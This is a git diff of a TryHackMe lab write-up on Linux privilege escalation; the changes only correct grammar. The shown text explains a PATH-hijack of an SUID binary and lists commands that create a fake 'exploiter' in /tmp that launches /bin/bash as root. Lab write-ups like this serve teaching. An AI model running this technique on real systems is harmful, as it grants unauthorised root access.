aisha-x/THM/Rooms/PT/Linux-privilege-escalation.md

 $ ls -l test
 -rwSrw-r--  1 karen karen 16056 Jul 15 13:35 test
 ```
-Once executed `test` will look for an executable named `exploiter` inside folders listed under `PATH`.
-As the SUID bit is set, this binary will run with root privilege
+Once executed, `test` will look for an executable named `exploiter` inside folders listed under `PATH`.
+As the SUID bit is set, this binary will run with root privileges

-Now, lets create the system binary that will be executed by the `test` binary in the `/tmp` folder.
+Now, let's create the system binary that will be executed by the `test` binary in the `/tmp` folder.
 ```bash
 $ echo "/bin/bash" > exploiter
 $ chmod 777 exploiter